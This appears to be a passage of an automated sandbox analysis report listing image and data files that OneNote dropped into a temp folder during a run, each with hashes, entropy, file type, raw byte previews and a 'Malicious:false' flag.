                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{852F3DC6-0CD6-487C-8EEE-70C6937BB0B5}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8A242FA7-CF57-4B52-981F-27F085C43FDA}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22203
                                                                                                                                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                                                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                                                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                                                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                                                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8AF39E93-9143-4248-BCB0-1D11B089919F}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8CF3A201-5104-46C4-A9AA-7D8572692C44}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8D72256A-257C-4BEE-AE60-53EDB6CF675F}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8F046AE3-25F1-464D-BE11-E0F08F3B9E23}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8FFB1524-81B9-49FF-B095-7D2D3F22EC2E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):32656
                                                                                                                                                                                                                  Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                                  MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                                  SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                                  SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                                  SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{905E6FA1-A837-4D7F-9C3E-A1D667477B5D}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{91AA26E3-ED9A-4A81-8D01-432A4C48FF80}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{91B26002-081C-4ED5-A433-40B6F5AF9A80}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{91F0D826-C9F8-4FD3-B98E-7116D0076A73}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{93F31D41-510F-40E6-9288-3AD1834B7BAE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4744
                                                                                                                                                                                                                  Entropy (8bit):0.6486040066852908
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:RaR6ytFYyfB3h1RRXUnfjiwlOFBzoOHKOtTfet/BRujlw//0lweI/gWet/jRujd:RaRxbYyf9/UfjiwlqBzoO3XWf/7b
                                                                                                                                                                                                                  MD5:55D98C4AA3F215960F28F273F59A8486
                                                                                                                                                                                                                  SHA1:360E4792EA854A426D9278FC32ECA373E13095C5
                                                                                                                                                                                                                  SHA-256:3CC86C4317C9730976E158B20ED0149D308CF9E680394FF2377244BF5FE0010F
                                                                                                                                                                                                                  SHA-512:D1C61D3CE6C7631E86EC6255542BE959B9087A552DF9CDDFD9BEE556E06EBC437FA387156FDC05169B3B83DD5D3153F9CDC1086FF4EFB9D6688CC5C9D695CA28
                                                                                                                                                                                                                  Malicious:false
